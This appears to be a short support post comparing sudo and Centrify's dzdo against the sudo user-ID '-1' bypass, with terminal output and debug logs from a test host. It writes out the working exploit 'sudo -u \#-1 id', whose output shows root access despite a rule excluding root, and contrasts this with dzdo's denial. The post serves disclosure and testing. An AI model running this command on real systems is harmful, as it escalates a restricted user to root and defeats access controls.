16 October,19 at 09:28 AM
Privileged commands:
Name Command Path Run As Auth Exec Source Roles
--------------- ---------- --------- ------- ----- ----- --------------------
id/ng_child id User # Self Yes UNIX Login/ng_child
smk2k12r2-test1 ALL=(ALL, !root) PASSWD: /usr/bin/id
sudo -V
Sudo version 1.8.23
dzdo -V
Dzdo version 5.6.0-209(based on Sudo version 1.8.20p2)
Due to the vulnerability, sudo can be hacked to run as root:
sudo -u \#-1 id
[sudo] password for smk2k12r2-test1:
uid=0(root) gid=10000(unixgroup) groups=10000(unixgroup) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
dzdo -u \#-1 id
Sorry, user smk2k12r2-test1 is not allowed to execute '/bin/id' as #-1 on numenor.
If we look into detail, we can see dzdo did real id checking for the UID and denied as below:
Oct 15 13:39:14 localhost dzdo[56797]: DEBUG dz.rights match(command = /bin/id, binary = /bin/id, as = #-1, checkSelf = false) against pattern = id
.
.
Oct 15 13:39:14 localhost dzdo[56797]: DEBUG dz.rights requested user #-1 not allowed for this command object